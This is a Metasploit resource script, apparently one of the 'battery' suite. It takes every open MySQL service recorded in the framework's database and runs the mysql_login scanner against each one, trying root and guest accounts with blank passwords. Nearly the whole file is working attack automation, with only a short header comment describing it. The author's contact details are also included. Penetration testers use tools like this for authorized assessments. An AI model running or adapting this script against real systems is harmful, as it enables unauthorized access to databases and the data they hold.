<ruby>
=begin
  Name:  battery/mysql_login.rc
    This script is intended to be used with the Metasploit Framework as a part of the battery suite of resource scripts
    For more information see:
      Battery Resource Scripts: https://github.com/kn0/battery
      Metasploit Framework:  https://github.com/rapid7/metasploit-framework

  Author: kn0
    twitter: @TrentonIvey
    email: "Trenton.Ivey@example.com".gsub(/example/,'gmail')
    web: kn0.ninja

  Description:
    This Metasploit RC-File attempts to authenticate to discovered MySQL services using root:<blank> and guest:<blank> credentials.
    It does so by using auxiliary/scanner/mysql/mysql_login against all discovered MySQL services
    Targets are chosen by matching service names with 'mysql' and ports of 3306/tcp

=end
# Print Header
print_status "Using auxiliary/scanner/mysql/mysql_login"
  
# Get a list of target services
targets = []
begin
  framework.db.services.each do |service|
    if ( (service.name =~ /mysql/i or service.port.eql? 3306) and service.state.eql? 'open' and service.proto.eql? 'tcp')
      targets << {'ip' => service.host.address, 'port' => service.port}
    end
  end
  # Remove any duplicate entries
  targets.uniq!
rescue ActiveRecord::ConnectionNotEstablished
  puts "DB not connected..."
  return
end

if targets.empty?
  print_warning "No targets found"
else
  # Get a lits of unique target ports
  target_ports = (targets.map {|t| t['port'] }).uniq

  # Setup the module
  self.run_single("use auxiliary/scanner/mysql/mysql_login")
  self.run_single("set ShowProgress false")
  self.run_single("set VERBOSE true")
  self.run_single("set BLANK_PASSWORDS true")
  
  # Run the module once for each discovered target port (with the associated hosts)
  target_ports.each do |target_port|
    self.run_single("set RPORT #{target_port}")
    target_rhosts = ((targets.select {|t| t['port'].eql? target_port}).map {|t| t['ip'] }).join (" ")
    self.run_single("set RHOSTS #{target_rhosts}")

    # Try root:<blank>
    self.run_single("set USERNAME 'root'")
    self.run_single("run")
    # Try guest:<blank>
    self.run_single("set USERNAME 'guest'")
    self.run_single("run")
  end
end
</ruby>
